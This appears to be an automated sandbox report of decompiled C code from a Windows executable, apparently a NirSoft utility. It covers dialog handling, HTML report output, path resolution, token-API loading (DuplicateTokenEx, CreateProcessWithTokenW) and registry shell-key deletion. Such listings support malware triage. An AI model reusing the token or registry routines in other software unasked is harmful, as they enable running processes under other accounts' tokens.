                                                                                                  				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                  			}












                                                                                                  0x00409faf
                                                                                                  0x00409fb4
                                                                                                  0x00409fb5
                                                                                                  0x00409fb6
                                                                                                  0x0040a043
                                                                                                  0x0040a04a
                                                                                                  0x0040a058
                                                                                                  0x0040a05f
                                                                                                  0x0040a06d
                                                                                                  0x0040a074
                                                                                                  0x0040a08e
                                                                                                  0x0040a099
                                                                                                  0x0040a0ab
                                                                                                  0x0040a0c9
                                                                                                  0x0040a0ce
                                                                                                  0x00000000
                                                                                                  0x0040a0ce
                                                                                                  0x00409fc3
                                                                                                  0x00409fca
                                                                                                  0x00409fd8
                                                                                                  0x00409fdf
                                                                                                  0x00409ff9
                                                                                                  0x0040a006
                                                                                                  0x0040a018
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: %%0.%df
                                                                                                  • API String ID: 3473751417-763548558
                                                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                  				void _v8202;
                                                                                                  				short _v8204;
                                                                                                  				void* _t27;
                                                                                                  				short _t29;
                                                                                                  				short _t40;
                                                                                                  				void* _t41;
                                                                                                  				struct HMENU__* _t43;
                                                                                                  				short _t50;
                                                                                                  				void* _t52;
                                                                                                  				struct HMENU__* _t59;
                                                                                                  
                                                                                                  				E0040B550(0x2008, __ecx);
                                                                                                  				_t65 = _a8 - 4;
                                                                                                  				if(_a8 != 4) {
                                                                                                  					__eflags = _a8 - 5;
                                                                                                  					if(_a8 == 5) {
                                                                                                  						_t50 =  *0x40fe2c; // 0x0
                                                                                                  						__eflags = _t50;
                                                                                                  						if(_t50 == 0) {
                                                                                                  							L8:
                                                                                                  							_push(_a12);
                                                                                                  							_t27 = 5;
                                                                                                  							E00405E8D(_t27);
                                                                                                  							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                  							__eflags = _t29;
                                                                                                  							_a8 = _t29;
                                                                                                  							if(_t29 == 0) {
                                                                                                  								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                  							}
                                                                                                  							_v8204 = 0;
                                                                                                  							memset( &_v8202, 0, 0x2000);
                                                                                                  							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                  							__eflags = _v8204;
                                                                                                  							if(__eflags != 0) {
                                                                                                  								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                  							}
                                                                                                  							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                  							DestroyWindow(_a8);
                                                                                                  						} else {
                                                                                                  							while(1) {
                                                                                                  								_t40 =  *_t50;
                                                                                                  								__eflags = _t40;
                                                                                                  								if(_t40 == 0) {
                                                                                                  									goto L8;
                                                                                                  								}
                                                                                                  								__eflags = _t40 - _a12;
                                                                                                  								if(_t40 != _a12) {
                                                                                                  									_t50 = _t50 + 4;
                                                                                                  									__eflags = _t50;
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L13;
                                                                                                  							}
                                                                                                  							goto L8;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_push(_a12);
                                                                                                  					_t41 = 4;
                                                                                                  					E00405E8D(_t41);
                                                                                                  					_pop(_t52);
                                                                                                  					_t43 = LoadMenuW(_a4, _a12);
                                                                                                  					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                  					_t59 = _t43;
                                                                                                  					_push(1);
                                                                                                  					_push(_t59);
                                                                                                  					_push(_a12);
                                                                                                  					E0040605E(_t52, _t65);
                                                                                                  					DestroyMenu(_t59);
                                                                                                  				}
                                                                                                  				L13:
                                                                                                  				return 1;
                                                                                                  			}













                                                                                                  0x00406216
                                                                                                  0x0040621b
                                                                                                  0x00406222
                                                                                                  0x0040625f
                                                                                                  0x00406263
                                                                                                  0x00406269
                                                                                                  0x00406271
                                                                                                  0x00406273
                                                                                                  0x00406289
                                                                                                  0x00406289
                                                                                                  0x0040628e
                                                                                                  0x0040628f
                                                                                                  0x004062a9
                                                                                                  0x004062ab
                                                                                                  0x004062ad
                                                                                                  0x004062b0
                                                                                                  0x004062c3
                                                                                                  0x004062c3
                                                                                                  0x004062d3
                                                                                                  0x004062da
                                                                                                  0x004062f1
                                                                                                  0x004062f7
                                                                                                  0x004062fe
                                                                                                  0x0040630d
                                                                                                  0x00406312
                                                                                                  0x0040631e
                                                                                                  0x00406327
                                                                                                  0x00406275
                                                                                                  0x00406283
                                                                                                  0x00406283
                                                                                                  0x00406285
                                                                                                  0x00406287
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406277
                                                                                                  0x0040627a
                                                                                                  0x00406280
                                                                                                  0x00406280
                                                                                                  0x00000000
                                                                                                  0x00406280
                                                                                                  0x00000000
                                                                                                  0x0040627a
                                                                                                  0x00000000
                                                                                                  0x00406283
                                                                                                  0x00406273
                                                                                                  0x00406224
                                                                                                  0x00406224
                                                                                                  0x00406229
                                                                                                  0x0040622a
                                                                                                  0x0040622f
                                                                                                  0x00406236
                                                                                                  0x0040623c
                                                                                                  0x00406243
                                                                                                  0x00406245
                                                                                                  0x00406247
                                                                                                  0x00406248
                                                                                                  0x0040624b
                                                                                                  0x00406254
                                                                                                  0x00406254
                                                                                                  0x0040632d
                                                                                                  0x00406334

                                                                                                  APIs
                                                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                  • memset.MSVCRT ref: 004062DA
                                                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 973020956-4135340389
                                                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 65%
                                                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				void _v2050;
                                                                                                  				char _v2052;
                                                                                                  				void _v4098;
                                                                                                  				long _v4100;
                                                                                                  				void _v6146;
                                                                                                  				char _v6148;
                                                                                                  				void* __esi;
                                                                                                  				void* _t43;
                                                                                                  				intOrPtr* _t49;
                                                                                                  				intOrPtr* _t57;
                                                                                                  				void* _t58;
                                                                                                  				void* _t59;
                                                                                                  				intOrPtr _t62;
                                                                                                  				intOrPtr _t63;
                                                                                                  
                                                                                                  				_t49 = __ecx;
                                                                                                  				E0040B550(0x1800, __ecx);
                                                                                                  				_t57 = _t49;
                                                                                                  				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                  				_v4100 = 0;
                                                                                                  				memset( &_v4098, 0, 0x7fe);
                                                                                                  				_v2052 = 0;
                                                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                                                  				_v6148 = 0;
                                                                                                  				memset( &_v6146, 0, 0x7fe);
                                                                                                  				_t59 = _t58 + 0x24;
                                                                                                  				_t62 =  *0x40fe30; // 0x0
                                                                                                  				if(_t62 != 0) {
                                                                                                  					_push(0x40fe30);
                                                                                                  					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                  					_push(0x400);
                                                                                                  					_push( &_v2052);
                                                                                                  					L0040B1EC();
                                                                                                  					_t59 = _t59 + 0x10;
                                                                                                  				}
                                                                                                  				_t63 =  *0x40fe28; // 0x0
                                                                                                  				if(_t63 != 0) {
                                                                                                  					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                  				}
                                                                                                  				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                  				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                  				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                  				_push(0x400);
                                                                                                  				_push( &_v6148);
                                                                                                  				L0040B1EC();
                                                                                                  				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                  				_t64 = _a8 - 5;
                                                                                                  				if(_a8 == 5) {
                                                                                                  					return E00407D03(_t57, _t64, _a4);
                                                                                                  				}
                                                                                                  				return _t43;
                                                                                                  			}

















                                                                                                  0x004081e4
                                                                                                  0x004081ec
                                                                                                  0x004081fc
                                                                                                  0x00408200
                                                                                                  0x00408215
                                                                                                  0x0040821c
                                                                                                  0x0040822a
                                                                                                  0x00408231
                                                                                                  0x0040823f
                                                                                                  0x00408246
                                                                                                  0x0040824b
                                                                                                  0x0040824e
                                                                                                  0x0040825a
                                                                                                  0x0040825c
                                                                                                  0x00408261
                                                                                                  0x0040826c
                                                                                                  0x0040826d
                                                                                                  0x0040826e
                                                                                                  0x00408273
                                                                                                  0x00408273
                                                                                                  0x00408276
                                                                                                  0x0040827c
                                                                                                  0x0040828a
                                                                                                  0x00408290
                                                                                                  0x004082ab
                                                                                                  0x004082c5
                                                                                                  0x004082c6
                                                                                                  0x004082d1
                                                                                                  0x004082d2
                                                                                                  0x004082d3
                                                                                                  0x004082e7
                                                                                                  0x004082ec
                                                                                                  0x004082f0
                                                                                                  0x00000000
                                                                                                  0x004082f5
                                                                                                  0x004082fe

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                  				void _v526;
                                                                                                  				long _v528;
                                                                                                  				wchar_t* _t17;
                                                                                                  				signed int _t40;
                                                                                                  				wchar_t* _t50;
                                                                                                  
                                                                                                  				_t50 = __edi;
                                                                                                  				if(__esi[0] != 0x3a) {
                                                                                                  					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                  					if(_t17 == 0) {
                                                                                                  						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                  						if(_t40 < 0) {
                                                                                                  							if( *__esi != 0x5c) {
                                                                                                  								wcscpy(__edi, __esi);
                                                                                                  							} else {
                                                                                                  								_v528 = 0;
                                                                                                  								memset( &_v526, 0, 0x208);
                                                                                                  								E00404C08( &_v528);
                                                                                                  								memcpy(__edi,  &_v528, 4);
                                                                                                  								__edi[1] = __edi[1] & 0x00000000;
                                                                                                  								wcscat(__edi, __esi);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_v528 = 0;
                                                                                                  							memset( &_v526, 0, 0x208);
                                                                                                  							E00404C08( &_v528);
                                                                                                  							wcscpy(__edi,  &_v528);
                                                                                                  							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                  						}
                                                                                                  						L11:
                                                                                                  						return _t50;
                                                                                                  					}
                                                                                                  					_push( &(_t17[0]));
                                                                                                  					L4:
                                                                                                  					wcscpy(_t50, ??);
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  				_push(__esi);
                                                                                                  				goto L4;
                                                                                                  			}








                                                                                                  0x0040920a
                                                                                                  0x00409218
                                                                                                  0x00409223
                                                                                                  0x0040922c
                                                                                                  0x0040924b
                                                                                                  0x00409253
                                                                                                  0x0040929b
                                                                                                  0x004092e4
                                                                                                  0x0040929d
                                                                                                  0x004092a3
                                                                                                  0x004092b1
                                                                                                  0x004092bd
                                                                                                  0x004092cc
                                                                                                  0x004092d1
                                                                                                  0x004092d8
                                                                                                  0x004092dd
                                                                                                  0x00409255
                                                                                                  0x0040925b
                                                                                                  0x00409269
                                                                                                  0x00409275
                                                                                                  0x00409282
                                                                                                  0x0040928d
                                                                                                  0x00409292
                                                                                                  0x004092ec
                                                                                                  0x004092ef
                                                                                                  0x004092ef
                                                                                                  0x00409231
                                                                                                  0x00409232
                                                                                                  0x00409233
                                                                                                  0x00000000
                                                                                                  0x00409239
                                                                                                  0x0040921a
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00409223
                                                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                                                  • memset.MSVCRT ref: 00409269
                                                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                  • memset.MSVCRT ref: 004092B1
                                                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                  • String ID: \systemroot
                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 48%
                                                                                                  			E00409C70(signed int* _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                  				char* _v16;
                                                                                                  				int _v18;
                                                                                                  				signed int _v20;
                                                                                                  				char _v36;
                                                                                                  				intOrPtr* _t21;
                                                                                                  				struct HINSTANCE__* _t22;
                                                                                                  				signed int _t23;
                                                                                                  				signed int _t24;
                                                                                                  				_Unknown_base(*)()* _t26;
                                                                                                  				char* _t28;
                                                                                                  				int _t31;
                                                                                                  
                                                                                                  				_t21 = _a4;
                                                                                                  				if( *_t21 == 0) {
                                                                                                  					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  					_v8 = _t22;
                                                                                                  					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                  					 *_a4 = _t23;
                                                                                                  					_t24 = _t23 ^ _v8;
                                                                                                  					if((_t24 & 0xfff00000) != 0) {
                                                                                                  						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                  						_v20 = _v20 & 0x00000000;
                                                                                                  						_v12 = _t26;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosw");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsw");
                                                                                                  						_t28 =  &_v36;
                                                                                                  						asm("movsb");
                                                                                                  						_v16 = _t28;
                                                                                                  						_v20 = strlen(_t28);
                                                                                                  						_t31 = strlen( &_v36);
                                                                                                  						_v18 = _t31;
                                                                                                  						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                  					}
                                                                                                  					return _t24;
                                                                                                  				}
                                                                                                  				return _t21;
                                                                                                  			}
















                                                                                                  0x00409c73
                                                                                                  0x00409c7c
                                                                                                  0x00409c90
                                                                                                  0x00409c9f
                                                                                                  0x00409ca2
                                                                                                  0x00409ca7
                                                                                                  0x00409ca9
                                                                                                  0x00409cb1
                                                                                                  0x00409cc0
                                                                                                  0x00409cc2
                                                                                                  0x00409cc7
                                                                                                  0x00409ccf
                                                                                                  0x00409cd0
                                                                                                  0x00409cd7
                                                                                                  0x00409cd8
                                                                                                  0x00409cd9
                                                                                                  0x00409cda
                                                                                                  0x00409cdc
                                                                                                  0x00409ce0
                                                                                                  0x00409ce1
                                                                                                  0x00409ce9
                                                                                                  0x00409cf1
                                                                                                  0x00409cfb
                                                                                                  0x00409d08
                                                                                                  0x00409d08
                                                                                                  0x00000000
                                                                                                  0x00409d0d
                                                                                                  0x00409d0f

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                  • API String ID: 1027343248-2054640941
                                                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040289F(intOrPtr* __esi) {
                                                                                                  				void* _t9;
                                                                                                  				struct HINSTANCE__* _t10;
                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                  
                                                                                                  				if( *(__esi + 0x10) == 0) {
                                                                                                  					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                                                  					 *(__esi + 0x10) = _t10;
                                                                                                  					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                                                  					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                                                  					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                                                  					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                                                  					 *(__esi + 8) = _t14;
                                                                                                  					return _t14;
                                                                                                  				}
                                                                                                  				return _t9;
                                                                                                  			}






                                                                                                  0x004028a3
                                                                                                  0x004028ab
                                                                                                  0x004028bd
                                                                                                  0x004028ca
                                                                                                  0x004028d7
                                                                                                  0x004028e3
                                                                                                  0x004028e6
                                                                                                  0x004028e8
                                                                                                  0x00000000
                                                                                                  0x004028eb
                                                                                                  0x004028ec

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                  • API String ID: 2238633743-1970996977
                                                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 39%
                                                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                  				void* _v8;
                                                                                                  				void _v2054;
                                                                                                  				short _v2056;
                                                                                                  				void _v4102;
                                                                                                  				short _v4104;
                                                                                                  				signed int _t28;
                                                                                                  				void* _t34;
                                                                                                  
                                                                                                  				E0040B550(0x1004, __ecx);
                                                                                                  				_t36 = 0;
                                                                                                  				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                  					_v2056 = 0;
                                                                                                  					memset( &_v2054, 0, 0x7fe);
                                                                                                  					_v4104 = 0;
                                                                                                  					memset( &_v4102, 0, 0x7fe);
                                                                                                  					_t34 = __ebx + 0x20a;
                                                                                                  					_push(_t34);
                                                                                                  					_push(__ebx);
                                                                                                  					_push(L"%s\\shell\\%s\\command");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v2056);
                                                                                                  					L0040B1EC();
                                                                                                  					_push(_t34);
                                                                                                  					_push(__ebx);
                                                                                                  					_push(L"%s\\shell\\%s");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v4104);
                                                                                                  					L0040B1EC();
                                                                                                  					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                  					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                  					asm("sbb esi, esi");
                                                                                                  					_t36 =  ~_t28 + 1;
                                                                                                  					RegCloseKey(_v8);
                                                                                                  				}
                                                                                                  				return _t36;
                                                                                                  			}










                                                                                                  0x004045c2
                                                                                                  0x004045d1
                                                                                                  0x004045da
                                                                                                  0x004045ef
                                                                                                  0x004045f6
                                                                                                  0x00404604
                                                                                                  0x0040460b
                                                                                                  0x00404610
                                                                                                  0x00404616
                                                                                                  0x00404617
                                                                                                  0x00404618
                                                                                                  0x00404628
                                                                                                  0x00404629
                                                                                                  0x0040462a
                                                                                                  0x0040462f
                                                                                                  0x00404630
                                                                                                  0x00404631
                                                                                                  0x0040463c
                                                                                                  0x0040463d
                                                                                                  0x0040463e
                                                                                                  0x00404656
                                                                                                  0x00404662
                                                                                                  0x0040466b
                                                                                                  0x0040466d
                                                                                                  0x0040466e
                                                                                                  0x00404674
                                                                                                  0x00404679

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
